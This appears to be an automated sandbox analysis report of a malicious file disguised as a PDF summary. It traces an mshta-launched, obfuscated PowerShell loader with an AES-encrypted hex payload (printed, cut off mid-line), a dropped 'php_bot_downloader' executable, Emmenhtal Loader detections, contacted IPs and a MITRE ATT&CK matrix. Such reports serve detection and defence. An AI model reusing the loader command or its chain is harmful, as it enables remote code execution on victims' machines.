        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'CC0D32DBB8F2AEAAAD367283309458E20D13E54AE9F93C26DBBAD73293BD50A36D9574E1A9FCCBBE98A49FC7AA50C3C051F3CBAE9B99771F9B3471A8B7406647B45710656B9560F816F99C52E5CD056E94BB343C78DECD912750ECF5C120A3C6120F92F9AB407C779692B2B801886D4C1933853B818B2F4ACBF254531544A97C461534F8989BDBE763C47BD13A5027B3175BDB8C0BA73400B08CB34FF3383856710CB6019243D1C36B39D01C9442DBEB89528D749444614EA6F3A125CFDB0B5CB39EA903AD087683829FAE488C94736BC882DFA6F1B5BADE602DC13EA4A71F59C0C555E4AA6CC495A964CEE240BAC2F3D429AA98692B0BF989429E291DCF520A3167A6D7D554A48ED1EC98E1F71AA758670750C98404FB140B70E6F8CE88015D69E8D0F3FCF7F737F074F810905C0DD5FD37726F325B89CC02C3B0CD71DD28A101A9080999F615A7AF33942A1FEAF9033FFB3CB02D88C83CEA4BEB13D36CCCDE536D2D4EA38EA00E492838E3E78EE9C0CA9DBC405A5C6F049999533FD9F5FA7404801734E8378978546AAF5D84956D74F1C451D373B86F3488593922F15AEE13BA02471A9C112CEDF4833B3F0638A4A8CECD1D52E9714EA9EDEB5E32944EB33FE52FB8A4B556B1DA6183E48183ACE760AE01310141F680BF3D33446801FC2BFD3000C1BDD51A6E8F30AA8A9B5C8BFBB555A5C04AC12A81509772CE127CB8598C525EBA2A091166AA250CCC96785ABD72973ECED6924E22C09BD25C868452073029B96D7C754E3D74FDF15E08C2A0F4C53F93F39EC3F0FD965A188FDF13D042BBC47CF96138A70FAB9162E32734D3C137CC3A4D27DB5363F9FA5F59ECAC5ADF283B806C00431D7D240795F83F85010F571088B246CEEDC36DADA39641C871CCD8E775017B5A338D1D94E045C140E05F8F86DB296BFFD092C327B31BB3D19F8C1B5B5EFBFD54647ABB292A0F16D86139B074238F1AB2638E0A3034AC7C00056A6E988B63A360B70DCBCDFD1A98A7DE9D02F1760C98DEFEFD55748A81631DD8336CCBC8BDB9784FDC8ED2398FADF660B1349E919FD6497D31A84903C8649BB847B3734E51D3C9ABDFA5BBE03A6CA0E3EC6A9ABB6054F6EB3DE0B804173A9DFDFD85C03FBB3DD4CD7152D30D13AF80E4BC2D9D561DB494C445384AF14A71AF67A3F252F2BAB0EB8A399A9F3DE478EE0920E4F717E63A195E6394FFD001BEFEED37566A40C55DC5CF48EF42822AD3876834FF7F2C41AA52134D41CE152176D5FBC298F91AF4E5C2ADB1486720693646536D8308BF068787AEE0EED268732FA76B22C73A43EEC2E677B595D575F1EDD71FAEC18238660E9D88409FA932407116BB516B6340B888E6FF5C5E303826F793F4E87135C2D9D20886EB5FCFC42C0D9603B67C13BBE82488090447CE2D406BCE4F71F8DED1277FB46A3F2E9FEB147880DEF6AD74481A95C5A94D480FA6742D967332B49570E903748A0BC475D54F8A4C548412C4AE30767A66A97B5BCFEE2DCB02BD3B11FA82EA1D214EA6520580B2DDF1FACDAD83B1921E52658D688B42F0DC0F163134922A308D66702D2E0ABFC978ECCE276FD6423CFF201D4169303D1FEE518BF422FDA896E2625653444DDB524D1779473C3EF10919F817A39FEBE05CE776ACD3EEB5F6529FC14DA7797DC617900100111D543A4680515798A7EB47B4C3C8F79DA82C90F0A61ADCC29B3FFCB05F9F13ECC10A907A9F8FD908476EA00AAE8E8631736D715947485271496F5853536B744B';function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.LengJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Professional_Social_Media_Report.pdf"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe "C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe" Jump to behavior
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = 'cc0d32dbb8f2aeaaad367283309458e20d13e54ae9f93c26dbbad73293bd50a36d9574e1a9fccbbe98a49fc7aa50c3c051f3cbae9b99771f9b3471a8b7406647b45710656b9560f816f99c52e5cd056e94bb343c78decd912750ecf5c120a3c6120f92f9ab407c779692b2b801886d4c1933853b818b2f4acbf254531544a97c461534f8989bdbe763c47bd13a5027b3175bdb8c0ba73400b08cb34ff3383856710cb6019243d1c36b39d01c9442dbeb89528d749444614ea6f3a125cfdb0b5cb39ea903ad087683829fae488c94736bc882dfa6f1b5bade602dc13ea4a71f59c0c555e4aa6cc495a964cee240bac2f3d429aa98692b0bf989429e291dcf520a3167a6d7d554a48ed1ec98e1f71aa758670750c98404fb140b70e6f8ce88015d69e8d0f3fcf7f737f074f810905c0dd5fd37726f325b89cc02c3b0cd71dd28a101a9080999f615a7af33942a1feaf9033ffb3cb02d88c83cea4beb13d36cccde536d2d4ea38ea00e492838e3e78ee9c0ca9dbc405a5c6f049999533fd9f5fa7404801734e8378978546aaf5d84956d74f1c451d373b86f3488593922f15aee13ba02471a9c112cedf4833b3f0638a4a8cecd1d52e9714ea9edeb5e32944eb33fe52fb8a4b556b1da6183e48183ace760ae01310141f680bf3d33446801fc2bfd3000c1bdd51a6e8f30aa8a9b5c8bfbb555a5c04ac12a81509772ce127cb8598c525eba2a091166aa250ccc96785abd72973eced6924e22c09bd25c868452073029b96d7c754e3d74fdf15e08c2a0f4c53f93f39ec3f0fd965a188fdf13d042bbc47cf96138a70fab9162e32734d3c137cc3a4d27db5363f9fa5f59ecac5adf283b806c00431d7d240795f83f85010f571088b246ceedc36dada39641c871ccd8e775017b5a338d1d94e045c140e05f8f86db296bffd092c327b31bb3d19f8c1b5b5efbfd54647abb292a0f16d86139b074238f1ab2638e0a3034ac7c00056a6e988b63a360b70dcbcdfd1a98a7de9d02f1760c98defefd55748a81631dd8336ccbc8bdb9784fdc8ed2398fadf660b1349e919fd6497d31a84903c8649bb847b3734e51d3c9abdfa5bbe03a6ca0e3ec6a9abb6054f6eb3de0b804173a9dfdfd85c03fbb3dd4cd7152d30d13af80e4bc2d9d561db494c445384af14a71af67a3f252f2bab0eb8a399a9f3de478ee0920e4f717e63a195e6394ffd001befeed37566a40c55dc5cf48ef42822ad3876834ff7f2c41aa52134d41ce152176d5fbc298f91af4e5c2adb1486720693646536d8308bf068787aee0eed268732fa76b22c73a43eec2e677b595d575f1edd71faec18238660e9d88409fa932407116bb516b6340b888e6ff5c5e303826f793f4e87135c2d9d20886eb5fcfc42c0d9603b67c13bbe82488090447ce2d406bce4f71f8ded1277fb46a3f2e9feb147880def6ad74481a95c5a94d480fa6742d967332b49570e903748a0bc475d54f8a4c548412c4ae30767a66a97b5bcfee2dcb02bd3b11fa82ea1d214ea6520580b2ddf1facdad83b1921e52658d688b42f0dc0f163134922a308d66702d2e0abfc978ecce276fd6423cff201d4169303d1fee518bf422fda896e2625653444ddb524d1779473c3ef10919f817a39febe05ce776acd3eeb5f6529fc14da7797dc617900100111d543a4680515798a7eb47b4c3c8f79da82c90f0a61adcc29b3ffcb05f9f13ecc10a907a9f8fd908476ea00aae8e8631736d715947485271496f5853536b744b';function wlh ($iuudd){return -split ($iuudd -replace '..', '0x$& ')};$feifxp = wlh($ddg.substring(0, 2464));$zxe = [system.security.cryptography.aes]::create();$zxe.key = wlh($ddg.substring(2464));$zxe.iv = new-object byte[] 16;$qlashzgh = $zxe.createdecryptor();$pwinroq = [system.string]::new($qlashzgh.transformfinalblock($feifxp, 0,$feifxp.leng
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = 'cc0d32dbb8f2aeaaad367283309458e20d13e54ae9f93c26dbbad73293bd50a36d9574e1a9fccbbe98a49fc7aa50c3c051f3cbae9b99771f9b3471a8b7406647b45710656b9560f816f99c52e5cd056e94bb343c78decd912750ecf5c120a3c6120f92f9ab407c779692b2b801886d4c1933853b818b2f4acbf254531544a97c461534f8989bdbe763c47bd13a5027b3175bdb8c0ba73400b08cb34ff3383856710cb6019243d1c36b39d01c9442dbeb89528d749444614ea6f3a125cfdb0b5cb39ea903ad087683829fae488c94736bc882dfa6f1b5bade602dc13ea4a71f59c0c555e4aa6cc495a964cee240bac2f3d429aa98692b0bf989429e291dcf520a3167a6d7d554a48ed1ec98e1f71aa758670750c98404fb140b70e6f8ce88015d69e8d0f3fcf7f737f074f810905c0dd5fd37726f325b89cc02c3b0cd71dd28a101a9080999f615a7af33942a1feaf9033ffb3cb02d88c83cea4beb13d36cccde536d2d4ea38ea00e492838e3e78ee9c0ca9dbc405a5c6f049999533fd9f5fa7404801734e8378978546aaf5d84956d74f1c451d373b86f3488593922f15aee13ba02471a9c112cedf4833b3f0638a4a8cecd1d52e9714ea9edeb5e32944eb33fe52fb8a4b556b1da6183e48183ace760ae01310141f680bf3d33446801fc2bfd3000c1bdd51a6e8f30aa8a9b5c8bfbb555a5c04ac12a81509772ce127cb8598c525eba2a091166aa250ccc96785abd72973eced6924e22c09bd25c868452073029b96d7c754e3d74fdf15e08c2a0f4c53f93f39ec3f0fd965a188fdf13d042bbc47cf96138a70fab9162e32734d3c137cc3a4d27db5363f9fa5f59ecac5adf283b806c00431d7d240795f83f85010f571088b246ceedc36dada39641c871ccd8e775017b5a338d1d94e045c140e05f8f86db296bffd092c327b31bb3d19f8c1b5b5efbfd54647abb292a0f16d86139b074238f1ab2638e0a3034ac7c00056a6e988b63a360b70dcbcdfd1a98a7de9d02f1760c98defefd55748a81631dd8336ccbc8bdb9784fdc8ed2398fadf660b1349e919fd6497d31a84903c8649bb847b3734e51d3c9abdfa5bbe03a6ca0e3ec6a9abb6054f6eb3de0b804173a9dfdfd85c03fbb3dd4cd7152d30d13af80e4bc2d9d561db494c445384af14a71af67a3f252f2bab0eb8a399a9f3de478ee0920e4f717e63a195e6394ffd001befeed37566a40c55dc5cf48ef42822ad3876834ff7f2c41aa52134d41ce152176d5fbc298f91af4e5c2adb1486720693646536d8308bf068787aee0eed268732fa76b22c73a43eec2e677b595d575f1edd71faec18238660e9d88409fa932407116bb516b6340b888e6ff5c5e303826f793f4e87135c2d9d20886eb5fcfc42c0d9603b67c13bbe82488090447ce2d406bce4f71f8ded1277fb46a3f2e9feb147880def6ad74481a95c5a94d480fa6742d967332b49570e903748a0bc475d54f8a4c548412c4ae30767a66a97b5bcfee2dcb02bd3b11fa82ea1d214ea6520580b2ddf1facdad83b1921e52658d688b42f0dc0f163134922a308d66702d2e0abfc978ecce276fd6423cff201d4169303d1fee518bf422fda896e2625653444ddb524d1779473c3ef10919f817a39febe05ce776acd3eeb5f6529fc14da7797dc617900100111d543a4680515798a7eb47b4c3c8f79da82c90f0a61adcc29b3ffcb05f9f13ecc10a907a9f8fd908476ea00aae8e8631736d715947485271496f5853536b744b';function wlh ($iuudd){return -split ($iuudd -replace '..', '0x$& ')};$feifxp = wlh($ddg.substring(0, 2464));$zxe = [system.security.cryptography.aes]::create();$zxe.key = wlh($ddg.substring(2464));$zxe.iv = new-object byte[] 16;$qlashzgh = $zxe.createdecryptor();$pwinroq = [system.string]::new($qlashzgh.transformfinalblock($feifxp, 0,$feifxp.lengJump to behavior
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E413D0 cpuid 12_2_00007FF658E413D0
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: EnumSystemLocalesW,12_2_00007FF658E45B0C
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: EnumSystemLocalesW,12_2_00007FF658E3C2AC
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: EnumSystemLocalesW,12_2_00007FF658E45A3C
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00007FF658E45BA4
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: GetLocaleInfoW,12_2_00007FF658E45DF0
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,12_2_00007FF658E456F0
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: GetLocaleInfoW,12_2_00007FF658E45FF8
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_00007FF658E45F48
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: try_get_function,GetLocaleInfoW,12_2_00007FF658E3C750
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00007FF658E46124
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\tar.exeQueries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip VolumeInformation
        Source: C:\Windows\System32\tar.exeQueries volume information: C:\Users VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeQueries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php VolumeInformation
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeQueries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeQueries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php VolumeInformation
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeQueries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\config.json VolumeInformation
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeQueries volume information: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\config.json VolumeInformation
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E2E1F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00007FF658E2E1F8
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        barindex
        Yara detected Emmenhtal Loader
        Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 7872, type: MEMORYSTR
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], type: DROPPED

        Remote Access Functionality

        barindex
        Yara detected Emmenhtal Loader
        Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 7872, type: MEMORYSTR
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], type: DROPPED
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FF7498C60A0 php_network_getaddresses,free,socket,closesocket,__zend_malloc,htons,__zend_malloc,htons,setsockopt,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,free,php_network_freeaddresses,closesocket,php_socket_error_str,getsockname,htons,24_2_00007FF7498C60A0

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information211
        Scripting        		Valid Accounts21
        Windows Management Instrumentation        		211
        Scripting        		11
        Process Injection        		121
        Masquerading        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Email Collection        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter        		2
        Registry Run Keys / Startup Folder        		2
        Registry Run Keys / Startup Folder        		31
        Virtualization/Sandbox Evasion        		LSASS Memory131
        Security Software Discovery        		Remote Desktop Protocol1
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        PowerShell        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		11
        Process Injection        		Security Account Manager11
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Obfuscated Files or Information        		NTDS31
        Virtualization/Sandbox Evasion        		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Timestomp        		LSA Secrets1
        Application Window Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials3
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync45
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1584384 Sample: HateSpeech2024_Summary.pdf.... Startdate: 05/01/2025 Architecture: WINDOWS Score: 100 90 Malicious sample detected (through community Yara rule) 2->90 92 Windows shortcut file (LNK) starts blacklisted processes 2->92 94 Multi AV Scanner detection for submitted file 2->94 96 12 other signatures 2->96 12 WMIC.exe 1 2->12         started        15 wscript.exe 2->15         started        17 svchost.exe 1 1 2->17         started        process3 dnsIp4 114 Contains functionality to create processes via WMI 12->114 116 Creates processes via WMI 12->116 20 powershell.exe 7 12->20         started        23 conhost.exe 1 12->23         started        118 Windows shortcut file (LNK) starts blacklisted processes 15->118 120 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->120 25 cmd.exe 15->25         started        84 127.0.0.1 unknown unknown 17->84 signatures5 process6 signatures7 98 Windows shortcut file (LNK) starts blacklisted processes 20->98 100 Powershell drops PE file 20->100 27 powershell.exe 7 20->27         started        30 conhost.exe 20->30         started        32 php.exe 25->32         started        34 conhost.exe 25->34         started        process8 signatures9 106 Windows shortcut file (LNK) starts blacklisted processes 27->106 36 mshta.exe 17 27->36         started        108 Found PHP interpreter 32->108 process10 dnsIp11 86 104.21.2.79 CLOUDFLARENETUS United States 36->86 70 C:\Users\user\AppData\Local\...\samm[1], PE32 36->70 dropped 102 Windows shortcut file (LNK) starts blacklisted processes 36->102 104 Suspicious powershell command line found 36->104 41 powershell.exe 17 18 36->41         started        file12 signatures13 process14 file15 72 php_bot_downloader...AVERAGE-BOI-CLN.exe, PE32+ 41->72 dropped 44 php_bot_downloader_v2-AVERAGE-BOI-CLN.exe 41->44         started        48 Acrobat.exe 83 41->48         started        50 conhost.exe 41->50         started        process16 dnsIp17 88 213.139.205.247 SERVERHOSH-AS-APServerhoshInternetServiceNL Netherlands 44->88 122 Windows shortcut file (LNK) starts blacklisted processes 44->122 52 cmd.exe 44->52         started        54 cmd.exe 44->54         started        56 